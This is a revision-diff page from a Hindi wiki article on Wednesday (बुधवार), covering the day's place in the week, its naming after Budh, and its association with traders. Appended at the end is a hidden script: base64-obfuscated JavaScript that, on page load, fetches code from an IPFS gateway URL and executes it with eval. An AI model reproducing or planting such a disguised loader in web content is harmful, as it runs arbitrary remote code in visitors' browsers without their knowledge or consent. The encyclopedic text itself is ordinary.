Difference between revisions of "बुधवार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replacement - "अर्थात " to "अर्थात् ")
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{बहुविकल्पी|बुध}}
+
'''बुधवार''' ([[अंग्रेज़ी]]: ''Budhwar'' OR ''Wednesday'') [[सप्ताह]] का चौथा [[दिन]] है ।  
*बुधवार [[सप्ताह]] का चौथा दिन है ।  
 
 
*बुधवार [[मंगलवार]] के बाद और [[बृहस्पतिवार]] से पहले आता है ।  
 
*बुधवार [[मंगलवार]] के बाद और [[बृहस्पतिवार]] से पहले आता है ।  
 
*बुधवार का नाम 'बुध' से पड़ा है जिसका तात्पर्य एक हिन्दू [[देवता]] से है ।
 
*बुधवार का नाम 'बुध' से पड़ा है जिसका तात्पर्य एक हिन्दू [[देवता]] से है ।
 
*बुधवार व्यापारियों के लिए अच्छा दिन है।  
 
*बुधवार व्यापारियों के लिए अच्छा दिन है।  
 
*इस दिन व्यापारी अपने उत्पादों के भावों की समीक्षा कर उसमें आम तौर पर बढोत्तरी करते पाए गए हैं।
 
*इस दिन व्यापारी अपने उत्पादों के भावों की समीक्षा कर उसमें आम तौर पर बढोत्तरी करते पाए गए हैं।
*जापान में बुधवार को 'सुईयोबी' अर्थात 'पानी का दिन' माना जाता है।  
+
*जापान में बुधवार को 'सुईयोबी' अर्थात् 'पानी का दिन' माना जाता है।  
 
*रोमन केलैंण्डर में 'चौथे दिन' को 'बुध' कहा जाता है।
 
*रोमन केलैंण्डर में 'चौथे दिन' को 'बुध' कहा जाता है।
  
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
  
{{संदर्भ ग्रंथ}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{दिवस}}
+
{{दिवस}}{{तिथि}}
{{तिथि}}
 
 
{{काल गणना}}
 
{{काल गणना}}
 
[[Category:कैलंडर]]
 
[[Category:कैलंडर]]
 
[[Category:पंचांग]]
 
[[Category:पंचांग]]
 +
[[Category:काल गणना]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:56, 7 November 2017

budhavar (aangrezi: Budhwar OR Wednesday) saptah ka chautha din hai .

  • budhavar mangalavar ke bad aur brihaspativar se pahale ata hai .
  • budhavar ka nam 'budh' se p da hai jisaka tatpary ek hindoo devata se hai .
  • budhavar vyapariyoan ke lie achchha din hai.
  • is din vyapari apane utpadoan ke bhavoan ki samiksha kar usamean am taur par badhottari karate pae ge haian.
  • japan mean budhavar ko 'sueeyobi' arthath 'pani ka din' mana jata hai.
  • roman kelaianndar mean 'chauthe din' ko 'budh' kaha jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>